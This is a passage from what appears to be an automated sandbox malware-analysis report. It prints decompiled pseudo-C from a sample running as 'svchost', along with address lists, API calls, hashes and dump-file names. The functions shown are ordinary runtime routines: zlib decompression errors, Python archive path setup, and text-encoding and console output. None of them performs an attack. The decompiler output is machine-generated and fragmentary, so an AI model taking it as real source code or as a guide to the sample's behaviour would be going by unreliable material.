					E00BC1980(_t46);
					return 0;
				}
			}














                            0x00bc1035
                            0x00bc1039
                            0x00bc103c
                            0x00bc1047
                            0x00bc104c
                            0x00bc104e
                            0x00bc1065
                            0x00bc1069
                            0x00bc106c
                            0x00bc1074
                            0x00bc107c
                            0x00bc1084
                            0x00bc1088
                            0x00bc108d
                            0x00bc1090
                            0x00bc1094
                            0x00bc1098
                            0x00bc109f
                            0x00bc10b5
                            0x00bc10b7
                            0x00bc10fb
                            0x00bc1105
                            0x00bc110d
                            0x00bc1114
                            0x00bc10b9
                            0x00bc10bd
                            0x00bc10bf
                            0x00bc10c8
                            0x00bc10ca
                            0x00bc10e1
                            0x00bc10eb
                            0x00bc10f3
                            0x00bc10fa
                            0x00bc10cc
                            0x00bc10d1
                            0x00bc10e0
                            0x00bc10e0
                            0x00bc10ca
                            0x00bc1050
                            0x00bc1050
                            0x00bc1055
                            0x00bc1064
                            0x00bc1064

                            APIs
                            Strings
                            • Error %d from inflateInit: %s, xrefs: 00BC1100
                            • 1.2.11, xrefs: 00BC10A7
                            • Error allocating decompression buffer, xrefs: 00BC1050
                            • Error %d from inflate: %s, xrefs: 00BC10E6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: 1.2.11$Error %d from inflate: %s$Error %d from inflateInit: %s$Error allocating decompression buffer
                            • API String ID: 2009864989-3188157777
                            • Opcode ID: 31ccc3921db0021fe0bc80bed3bc71683732f9e70f97cebc530492cf8c4a261d
                            • Instruction ID: e5c1ba176d3c1876a0215c86f5bd1a3bde88b310cd2e9ecc556d1372a6960c80
                            • Opcode Fuzzy Hash: 31ccc3921db0021fe0bc80bed3bc71683732f9e70f97cebc530492cf8c4a261d
                            • Instruction Fuzzy Hash: 24216575A043416BD700FA69AC06F8FBBD4EF81358F4448BDFA4892212F775D2598B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC3370, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: %U?%zu$Failed to append to sys.path$Installing PYZ: Could not get sys.path$path$strict$utf-8
                            • API String ID: 2009864989-2673223963
                            • Opcode ID: d919a72e55e06a7fcb30915f1284a40a44de428029f01fff4c63c1ae6382db39
                            • Instruction ID: 31f891c580e2564fbc97db742532c986db7451c797b9f0bb3c9de0fb371dc619
                            • Opcode Fuzzy Hash: d919a72e55e06a7fcb30915f1284a40a44de428029f01fff4c63c1ae6382db39
                            • Instruction Fuzzy Hash: 1A1134726002816FCB016B6ADC8AE5A7BD8EE9175170885E4FC069B213EB31EA41C6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4C90, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 65COMMON
                            Download Yara Rule
                            C-Code - Quality: 33%
                            			E00BC4C90(char* _a4, short* _a8, int _a12) {
				void* _t17;
				void* _t18;
				int _t19;
				char* _t20;
				void* _t21;

				_t20 = _a4;
				if(_t20 != 0) {
					_t19 = _a12;
					goto L6;
				} else {
					_t19 = WideCharToMultiByte(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20, _t20, _t20);
					_t26 = _t19;
					if(_t19 != 0) {
						_t3 = _t19 + 1; // 0x1
						_push(1);
						_t20 = E00BC97F8(_t17);
						_t21 = _t21 + 8;
						__eflags = _t20;
						if(__eflags != 0) {
							L6:
							__eflags = WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff, _t20, _t19, 0, 0);
							if(__eflags != 0) {
								return _t20;
							} else {
								_push("Failed to encode wchar_t as UTF-8.\n");
								_push("WideCharToMultiByte");
								E00BC1860(_t18, __eflags);
								__eflags = 0;
								return 0;
							}
						} else {
							_push("Out of memory.");
							_push("win32_utils_to_utf8");
							E00BC1860(_t18, __eflags);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Failed to get UTF-8 buffer size.\n");
						_push("WideCharToMultiByte");
						E00BC1860(_t18, _t26);
						return 0;
					}
				}
			}








                            0x00bc4c91
                            0x00bc4c98
                            0x00bc4cf8
                            0x00000000
                            0x00bc4c9a
                            0x00bc4cb0
                            0x00bc4cb2
                            0x00bc4cb4
                            0x00bc4ccd
                            0x00bc4cd0
                            0x00bc4cd8
                            0x00bc4cda
                            0x00bc4cdd
                            0x00bc4cdf
                            0x00bc4cfc
                            0x00bc4d15
                            0x00bc4d17
                            0x00bc4d34
                            0x00bc4d19
                            0x00bc4d19
                            0x00bc4d1e
                            0x00bc4d23
                            0x00bc4d2b
                            0x00bc4d2f
                            0x00bc4d2f
                            0x00bc4ce1
                            0x00bc4ce1
                            0x00bc4ce6
                            0x00bc4ceb
                            0x00bc4cf3
                            0x00bc4cf7
                            0x00bc4cf7
                            0x00bc4cb6
                            0x00bc4cb6
                            0x00bc4cbb
                            0x00bc4cc0
                            0x00bc4ccc
                            0x00bc4ccc
                            0x00bc4cb4

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00BC48EC,00BF4A58,?,00001000,?,?), ref: 00BC4CAA
                              • Part of subcall function 00BC1860: GetLastError.KERNEL32(?,?), ref: 00BC187D
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,00BC48EC,00BF4A58,?,00001000,?,?), ref: 00BC4D0F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 1717984340-3595433791
                            • Opcode ID: 648fad8e1045e8a575f9407f809e1d32d8cb5f5af8084f26118107b8a5d342eb
                            • Instruction ID: d3422c8694c129bf29911653c36ccd69e2a648edbf9ef237a12c271acb6b77de
                            • Opcode Fuzzy Hash: 648fad8e1045e8a575f9407f809e1d32d8cb5f5af8084f26118107b8a5d342eb
                            • Instruction Fuzzy Hash: FA012B3B79927136D62031AF7C1AF8B29C8CB81BB1F250AE5FA04F61E2D760D90241F1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDD04A, Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E00BDD04A(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				short* _t68;
				int _t69;
				signed int _t71;
				short* _t72;
				signed int _t75;
				short* _t85;
				int _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				signed int _t107;
				char* _t109;
				char* _t110;
				void* _t115;
				void* _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t120;
				short* _t122;
				int _t124;
				int _t126;
				short* _t127;
				intOrPtr* _t128;
				signed int _t129;
				short* _t130;

				_t63 =  *0xbec008; // 0xdc55bb75
				_v8 = _t63 ^ _t129;
				_t124 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t120 = _a16;
				_v36 = _t120;
				if(_t124 <= 0) {
					if(_t124 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t124 = E00BDCA63(_t120, _t124);
					_t67 = _v40;
					L2:
					_t93 = _a28;
					if(_t93 <= 0) {
						if(_t93 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t93 = E00BDCA63(_t67, _t93);
						L7:
						_t69 = _a32;
						if(_t69 == 0) {
							_t69 =  *( *_v44 + 8);
							_a32 = _t69;
						}
						if(_t124 == 0 || _t93 == 0) {
							if(_t124 != _t93) {
								if(_t93 <= 1) {
									if(_t124 <= 1) {
										if(GetCPInfo(_t69,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t124 <= 0) {
												if(_t93 <= 0) {
													goto L36;
												} else {
													_t68 = 2;
													if(_v28 >= _t68) {
														_t109 =  &_v22;
														if(_v22 != 0) {
															_t128 = _v40;
															while(1) {
																_t117 =  *((intOrPtr*)(_t109 + 1));
																if(_t117 == 0) {
																	goto L15;
																}
																_t96 =  *_t128;
																if(_t96 <  *_t109 || _t96 > _t117) {
																	_t109 = _t109 + _t68;
																	if( *_t109 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t68 = 2;
												if(_v28 >= _t68) {
													_t110 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t118 =  *((intOrPtr*)(_t110 + 1));
															if(_t118 == 0) {
																goto L17;
															}
															_t97 =  *_t120;
															if(_t97 <  *_t110 || _t97 > _t118) {
																_t110 = _t110 + _t68;
																if( *_t110 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
									_t68 = 1;
								}
							} else {
								_push(2);
								L13:
								_pop(_t68);
							}
						} else {
							L36:
							_t122 = 0;
							_t71 = MultiByteToWideChar(_a32, 9, _v36, _t124, 0, 0);
							_v44 = _t71;
							if(_t71 == 0) {
								L5:
								_t68 = 0;
							} else {
								_t115 = _t71 + _t71;
								asm("sbb eax, eax");
								if((_t115 + 0x00000008 & _t71) == 0) {
									_t72 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t83 = _t71 & _t115 + 0x00000008;
									_t107 = _t115 + 8;
									if((_t71 & _t115 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t85 = E00BD0A25(_t107, _t83 & _t107);
										_v32 = _t85;
										if(_t85 == 0) {
											goto L61;
										} else {
											 *_t85 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00BDF250();
										_t85 = _t130;
										_v32 = _t85;
										if(_t85 == 0) {
											L61:
											_t95 = _v32;
										} else {
											 *_t85 = 0xcccc;
											L43:
											_t72 =  &(_t85[4]);
											_v32 = _t72;
											L45:
											if(_t72 == 0) {
												goto L61;
											} else {
												_t126 = _a32;
												if(MultiByteToWideChar(_t126, 1, _v36, _t124, _t72, _v44) == 0) {
													goto L61;
												} else {
													_t75 = MultiByteToWideChar(_t126, 9, _v40, _t93, _t122, _t122);
													_v36 = _t75;
													if(_t75 == 0) {
														goto L61;
													} else {
														_t116 = _t75 + _t75;
														_t103 = _t116 + 8;
														asm("sbb eax, eax");
														if((_t116 + 0x00000008 & _t75) == 0) {
															_t127 = _t122;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t79 = _t75 & _t116 + 0x00000008;
															_t103 = _t116 + 8;
															if((_t75 & _t116 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t127 = E00BD0A25(_t103, _t79 & _t103);
																_pop(_t103);
																if(_t127 == 0) {
																	goto L59;
																} else {
																	 *_t127 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00BDF250();
																_t127 = _t130;
																if(_t127 == 0) {
																	L59:
																	_t95 = _v32;
																} else {
																	 *_t127 = 0xcccc;
																	L54:
																	_t127 =  &(_t127[4]);
																	L56:
																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t93, _t127, _v36) == 0) {
																		goto L59;
																	} else {
																		_t95 = _v32;
																		_t122 = E00BD36EC(_t103, _v48, _a12, _v32, _v44, _t127, _v36, _t122, _t122, _t122);
																	}
																}
															}
														}
														E00BD815E(_t127);
													}
												}
											}
										}
									}
								}
								E00BD815E(_t95);
								_t68 = _t122;
							}
						}
					}
				}
				L63:
				E00BC786A();
				return _t68;
			}





































                            0x00bdd052
                            0x00bdd059
                            0x00bdd061
                            0x00bdd064
                            0x00bdd06a
                            0x00bdd06d
                            0x00bdd070
                            0x00bdd074
                            0x00bdd077
                            0x00bdd07c
                            0x00bdd0a3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdd07e
                            0x00bdd086
                            0x00bdd088
                            0x00bdd08c
                            0x00bdd08c
                            0x00bdd091
                            0x00bdd0af
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdd093
                            0x00bdd09c
                            0x00bdd0b1
                            0x00bdd0b1
                            0x00bdd0b6
                            0x00bdd0bd
                            0x00bdd0c0
                            0x00bdd0c0
                            0x00bdd0c5
                            0x00bdd0d1
                            0x00bdd0de
                            0x00bdd0eb
                            0x00bdd0fe
                            0x00000000
                            0x00bdd100
                            0x00bdd102
                            0x00bdd135
                            0x00000000
                            0x00bdd137
                            0x00bdd139
                            0x00bdd13d
                            0x00bdd143
                            0x00bdd146
                            0x00bdd148
                            0x00bdd14b
                            0x00bdd14b
                            0x00bdd150
                            0x00000000
                            0x00000000
                            0x00bdd152
                            0x00bdd156
                            0x00bdd160
                            0x00bdd165
                            0x00000000
                            0x00bdd167
                            0x00000000
                            0x00bdd167
                            0x00bdd165
                            0x00000000
                            0x00bdd156
                            0x00bdd14b
                            0x00bdd146
                            0x00000000
                            0x00bdd13d
                            0x00bdd104
                            0x00bdd106
                            0x00bdd10a
                            0x00bdd110
                            0x00bdd113
                            0x00bdd115
                            0x00bdd115
                            0x00bdd11a
                            0x00000000
                            0x00000000
                            0x00bdd11c
                            0x00bdd120
                            0x00bdd12a
                            0x00bdd12f
                            0x00000000
                            0x00bdd131
                            0x00000000
                            0x00bdd131
                            0x00bdd12f
                            0x00000000
                            0x00bdd120
                            0x00bdd115
                            0x00bdd113
                            0x00000000
                            0x00bdd10a
                            0x00bdd102
                            0x00bdd0ed
                            0x00bdd0ed
                            0x00bdd0ed
                            0x00000000
                            0x00bdd0ed
                            0x00bdd0e0
                            0x00bdd0e0
                            0x00bdd0e2
                            0x00bdd0e2
                            0x00bdd0d3
                            0x00bdd0d3
                            0x00bdd0d5
                            0x00bdd0d5
                            0x00bdd0d5
                            0x00bdd16c
                            0x00bdd16c
                            0x00bdd16c
                            0x00bdd179
                            0x00bdd17f
                            0x00bdd184
                            0x00bdd0a5
                            0x00bdd0a5
                            0x00bdd18a
                            0x00bdd18a
                            0x00bdd192
                            0x00bdd196
                            0x00bdd1f1
                            0x00bdd1f3
                            0x00000000
                            0x00bdd198
                            0x00bdd19d
                            0x00bdd19f
                            0x00bdd1a1
                            0x00bdd1a9
                            0x00bdd1cd
                            0x00bdd1d2
                            0x00bdd1d7
                            0x00bdd1dd
                            0x00000000
                            0x00bdd1e3
                            0x00bdd1e3
                            0x00000000
                            0x00bdd1e3
                            0x00bdd1ab
                            0x00bdd1ad
                            0x00bdd1b1
                            0x00bdd1b6
                            0x00bdd1b8
                            0x00bdd1bd
                            0x00bdd2d2
                            0x00bdd2d2
                            0x00bdd1c3
                            0x00bdd1c3
                            0x00bdd1e9
                            0x00bdd1e9
                            0x00bdd1ec
                            0x00bdd1f6
                            0x00bdd1f8
                            0x00000000
                            0x00bdd1fe
                            0x00bdd206
                            0x00bdd214
                            0x00000000
                            0x00bdd21a
                            0x00bdd223
                            0x00bdd229
                            0x00bdd22e
                            0x00000000
                            0x00bdd234
                            0x00bdd234
                            0x00bdd237
                            0x00bdd23c
                            0x00bdd240
                            0x00bdd28c
                            0x00000000
                            0x00bdd242
                            0x00bdd247
                            0x00bdd249
                            0x00bdd24b
                            0x00bdd253
                            0x00bdd270
                            0x00bdd27a
                            0x00bdd27c
                            0x00bdd27f
                            0x00000000
                            0x00bdd281
                            0x00bdd281
                            0x00000000
                            0x00bdd281
                            0x00bdd255
                            0x00bdd257
                            0x00bdd25b
                            0x00bdd260
                            0x00bdd264
                            0x00bdd2c6
                            0x00bdd2c6
                            0x00bdd266
                            0x00bdd266
                            0x00bdd287
                            0x00bdd287
                            0x00bdd28e
                            0x00bdd290
                            0x00000000
                            0x00bdd2a9
                            0x00bdd2a9
                            0x00bdd2c2
                            0x00bdd2c2
                            0x00bdd290
                            0x00bdd264
                            0x00bdd253
                            0x00bdd2ca
                            0x00bdd2cf
                            0x00bdd22e
                            0x00bdd214
                            0x00bdd1f8
                            0x00bdd1bd
                            0x00bdd1a9
                            0x00bdd2d6
                            0x00bdd2dc
                            0x00bdd2dc
                            0x00bdd184
                            0x00bdd0c5
                            0x00bdd091
                            0x00bdd2de
                            0x00bdd2e9
                            0x00bdd2f1

                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,00000000,7FFFFFFF,?,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 00BDD0F6
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 00BDD179
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00BDD323,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 00BDD20C
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 00BDD223
                              • Part of subcall function 00BD0A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 00BDD29F
                            • __freea.LIBCMT ref: 00BDD2CA
                            • __freea.LIBCMT ref: 00BDD2D6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 2829977744-0
                            • Opcode ID: 2655322e76336cd0bac6c9202dabf7607b5dc35e2a1e1eb1e2a99744b668d1b8
                            • Instruction ID: cbc6ff2ff7744bd0ac4fe4746636e6c4994cd0ce33527a982455dce171433b72
                            • Opcode Fuzzy Hash: 2655322e76336cd0bac6c9202dabf7607b5dc35e2a1e1eb1e2a99744b668d1b8
                            • Instruction Fuzzy Hash: FE919F71E0021A9ADB209EA4CC91AEEFBF5EF49710F1445ABE885E7341FB25DC45C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD2A10, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E00BD2A10(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0xbec008; // 0xdc55bb75
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xbf6108 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xbf6108 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00BD7D33(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xbf6108 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xbf6108 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0xbf6108 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00BD3F5B( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00BD3F5B();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E00BC786A();
				return _t136;
			}



































                            0x00bd2a18
                            0x00bd2a1f
                            0x00bd2a22
                            0x00bd2a2a
                            0x00bd2a2e
                            0x00bd2a3a
                            0x00bd2a3d
                            0x00bd2a40
                            0x00bd2a47
                            0x00bd2a4f
                            0x00bd2a52
                            0x00bd2a58
                            0x00bd2a5e
                            0x00bd2a63
                            0x00bd2a65
                            0x00bd2a68
                            0x00bd2a6d
                            0x00bd2a77
                            0x00bd2a7e
                            0x00bd2a81
                            0x00bd2a88
                            0x00bd2a8f
                            0x00bd2abb
                            0x00bd2ae1
                            0x00bd2ae3
                            0x00000000
                            0x00bd2abd
                            0x00bd2ac0
                            0x00bd2b87
                            0x00bd2b93
                            0x00bd2b9e
                            0x00bd2ba3
                            0x00bd2ac6
                            0x00bd2acd
                            0x00bd2ad2
                            0x00bd2ad8
                            0x00bd2ade
                            0x00000000
                            0x00bd2ade
                            0x00bd2ad8
                            0x00bd2ac0
                            0x00bd2a91
                            0x00bd2a95
                            0x00bd2a98
                            0x00bd2a9e
                            0x00bd2aa0
                            0x00bd2aa3
                            0x00bd2aa7
                            0x00bd2ae4
                            0x00bd2ae7
                            0x00bd2ae8
                            0x00bd2aed
                            0x00bd2af3
                            0x00bd2af9
                            0x00bd2b08
                            0x00bd2b0e
                            0x00bd2b14
                            0x00bd2b19
                            0x00bd2b35
                            0x00bd2ba8
                            0x00bd2bae
                            0x00bd2b37
                            0x00bd2b3f
                            0x00bd2b48
                            0x00bd2b4e
                            0x00000000
                            0x00bd2b50
                            0x00bd2b52
                            0x00bd2b55
                            0x00bd2b6e
                            0x00000000
                            0x00bd2b70
                            0x00bd2b74
                            0x00bd2b76
                            0x00bd2b79
                            0x00000000
                            0x00bd2b79
                            0x00bd2b74
                            0x00bd2b6e
                            0x00bd2b4e
                            0x00bd2b48
                            0x00bd2b35
                            0x00bd2b19
                            0x00bd2af3
                            0x00000000
                            0x00bd2b7c
                            0x00bd2b7c
                            0x00bd2bb0
                            0x00bd2bba
                            0x00bd2bc2

                            APIs
                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00BD3185,?,00000000,?,00000000,00000000), ref: 00BD2A52
                            • __fassign.LIBCMT ref: 00BD2ACD
                            • __fassign.LIBCMT ref: 00BD2AE8
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00BD2B0E
                            • WriteFile.KERNEL32(?,?,00000000,00BD3185,00000000,?,?,?,?,?,?,?,?,?,00BD3185,?), ref: 00BD2B2D
                            • WriteFile.KERNEL32(?,?,00000001,00BD3185,00000000,?,?,?,?,?,?,?,?,?,00BD3185,?), ref: 00BD2B66
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: 145f39dbe073f4c18607e04b04c74ebafb8467eb685fea9a1f4eebbeaa29d367
                            • Instruction ID: 01eafe51a3292121ffa7dc98ac17cfba8eb1c174b0c88a0499ea6d7a30a8fdf1
                            • Opcode Fuzzy Hash: 145f39dbe073f4c18607e04b04c74ebafb8467eb685fea9a1f4eebbeaa29d367
                            • Instruction Fuzzy Hash: 9F519E74A00289AFDF10CFA8D895AEEFBF8EF19300F14459BE955E7352E6709941CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4D40, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 102COMMON
                            Download Yara Rule
                            C-Code - Quality: 56%
                            			E00BC4D40(void* __ecx, void* __edx, void* __eflags) {
				int* _t18;
				short* _t21;
				char* _t22;
				short* _t28;
				int* _t31;
				void* _t34;
				short* _t36;
				int* _t41;
				signed int _t42;
				char* _t44;
				int _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_t34 = __edx;
				_t44 =  *(_t46 + 0x14);
				_push(4);
				_push( &(_t44[1]));
				_t18 = E00BC97F8(__ecx);
				_t31 = _t18;
				_t47 = _t46 + 8;
				if(_t31 != 0) {
					_t36 = 0;
					__eflags = _t44;
					if(_t44 <= 0) {
						L17:
						_t31[_t44] = 0;
						return _t31;
					} else {
